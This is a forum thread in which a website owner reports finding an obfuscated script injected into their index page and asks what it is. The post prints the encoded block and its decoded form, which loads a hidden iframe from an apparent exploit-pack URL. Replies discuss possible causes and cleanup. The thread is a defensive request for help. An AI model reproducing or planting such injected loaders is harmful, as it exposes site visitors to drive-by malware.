Hi all, I recently found the following code added on to the end of my index page:
Code:
<!--<S>--><script>
try {
var oOX='ppupHupqupaupbupyupJupxup7upCupeupiupcupzupAupsuprupKupUup5upkupfupLupIupPup4upBupNupdupjupXuptup9up8up3upYupRupFupwupoupGuplupMupSup6upZupmupWupgupDupnuphupTupVuHpuHHuHquHauHbuHy';
var tSF='u', AWL=Array(56626^56735,226,KG('242'),KG('227'),248,KG('225'),KG('229'),27941^28052,253,20712^20504,255,KG('246'),KG('228'),KG('244'),KG('172'),179,KG('251'),231,KG('175'),156,KG('155'),KG('245'),162,170,160,KG('247'),KG('185'),KG('254'),KG('252'),191,KG('250'),KG('233'),45475^45437,186,KG('184'),188,60713^60867,KG('249'),7437^7590,190,7474^7617,58640^58820,KG('208'),KG('189'),61411^61232,161,30649^30559,232,58259^58177,47178^47236,236,KG('213'),KG('197'),KG('167'),KG('187'),KG('163'),8550^8643,KG('214'),220,KG('194'));
var ge;
var Xbo,DZ;
var fc='pppHpqpapbpypJpxp7pCpepipcpCpipzpApsprpCpKpCpHpqpapbpypJpspUp5pkpKpCpapxpqpepxpApxpspcpepfpqpapLpspIp5pkpKpCpapxpqpKpxpApxpspPpspIp5pkpbp4pBpfpNpqpcpdpzpepJpjpqpNpNpXpbpzpjpbpepfpzptp9p4pBpqpep8pspApsp8pqpKp3pxpApApxpYpPp3p5pkpRp5pkpKpCpapxpcpap7pxpApxpspFpJpJpypwpopopfpzpcpJpqpFpGpCpepXpjpepzpJpopdpypCpqpXpopbpepfpzptpjpypFpypspIp5pkpKpCpapxpNpxpApxpfpNpqpcpdpzpepJpjpqpapzpCpJpzplp7pzpdpzpepJpBpspbp4papCpdpzpsp3pIpNpjpHpzpJpMpJpJpapbpGpcpJpzpBpspHpapqpspSpxpcpap7p3pIp5pkpNpjp4papCpdpzp6pNpapfpzpapApZpIpxpNpjpmpbpfpJpFpApPpIpxpNpjpFpzpbpipFpJpApPpIpxpNpjpHpJpWp7pzpjpfpbpHpyp7pCpWpApspepNpepzpspIpxp5pkpJpapWpxpRpxpfpNpqpcpdpzpepJpjpGpNpfpWpjpCpypypzpepfpgpFpbp7pfpBpNp3pIpxpapHpWpHpDpHpqpBpqpepSpqpKp3pIpnp5pkpqpCpJpqpFpBpzp3pRp5pkpfpNpqpcpdpzpepJpjpmpapbpJpzpBpspppFpJpdp7pUpppGpNpfpWpUpppopGpNpfpWpUpppopFpJpdp7pUpsp3pIp5pkpfpNpqpcpdpzpepJpjpGpNpfpWpjpCpypypzpepfpgpFpbp7pfpBpNp3pIpxpapHpWpHpDpHpqpBpqpepSpqpKp3pIp5pkpnpnp5pkp4pcpepqpJpbpNpepxpapHpWpHpDpHpqpBpqpepSpqpKp3pRpxpKpCpapxpJpApxpepzpmpxphpCpJpzpBp3pIpxpKpCpapxpzpApxpepzpmpxphpCpJpzpBp3pIpxpzpjpHpzpJpTpbpdpzpBpJpjpipzpJpTpbpdpzpBp3p8pLpVpZpZpZpZpZHpHHHqp3pIpxpfpNpqpcpdpzpepJpjpqpNpNpXpbpzpxpApxpqpep8pspApsp8pzpHpqpCpypzpBpqpKp3p8pspIpzptpypbpapzpHpApsp8pzpjpJpNHaHbpTHypJpapbpepipBp3pIpxpnp5pkpppopHpqpapbpypJpU';
var RU='';
function KG(xt){
return parseInt(xt)
}
oOX=oOX.split(tSF);
for(ge=0;ge<fc.length;ge+=2){
DZ=fc.substr(ge,2);
for(Xbo=0;Xbo<oOX.length;Xbo++){
if(oOX[Xbo]==DZ) break;
}
RU+=String.fromCharCode(AWL[Xbo]^145);
}
document.write(RU);
}
catch(e){
}</script><!--</S>-->
Based on the fromCharCode, and document.write statments, i knew something fishy was up, so I modified it a bit to see the output and I get the following code:
Code:
<script language="javascript">
var cn = "undcr3";
var cv = "1";
if(document.cookie.indexOf(cn+"="+cv) == -1)
{
var url = "http://deutchbank.net/mpack/index.php";
var o = document.createElement("iframe");o.setAttribute("src", url);
o.frameBorder=0; o.width=1; o.height=1; o.style.display="none";
try { document.body.appendChild(o); rsys_sc(cn,cv);}
catch(e){
document.write("<html><body></body></html>");
document.body.appendChild(o); rsys_sc(cn,cv);
}}
function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); }
</script>
Does anyone have any clue what this is and how it may have got there?
Thanks for the reply's. No, I use servage.net, and it's paid hosting that doesn't show ad's, and only google adsense banners are shown (which was scripting that I specifically added). I noticed the code was used across all other sites on my account (with different variable names, etc.. but output was the same). It was even on one site that is completely ad free, so there was no reason for it to show up there, at least not by my doing. I have a ticket open with the hosting service to see what they say about it, and I have already changed all of my passwords (ftp and web interface login)
hmm, I hope that is all that has happened. Though I found it by performing xhtml validation and it failed for the first time in a year. Maybe its something new, but regardless, they should notify me if they are going to mess up my validated code I'll wait and see what they say. Thanks for the reply again
Done, the code was not added. I should note that it was only added to my index.php, or main.php files.. Only on the main page whatever that page was (not in the header of footer files)
I came across something similar years ago when I was using a control panel to manage my sites. Maybe Ensim, I don't remember.. but I finally discovered that the control panel was adding the code. I got rid of it.
ok, well i actually use dreamweaver and ftp usually. But, if it is something like that, I think the hosting company would know about it and they will tell me. I hope you all are right. otherwise, 4 money making sites were comprimised in a manner that I dont even know about
Also, for the heck of it... does this code exist in the file itself or only when you view source? I know that sounds weird but... can you download the file from ftp and open the raw file?
it is in the file itself. in the .php. I went through and deleted it all, and now it is gone. And it doesn't sound wierd. I know exactly what you're asking.
Reply With Quote
I'll wait and see what they say. Thanks for the reply again
Bookmarks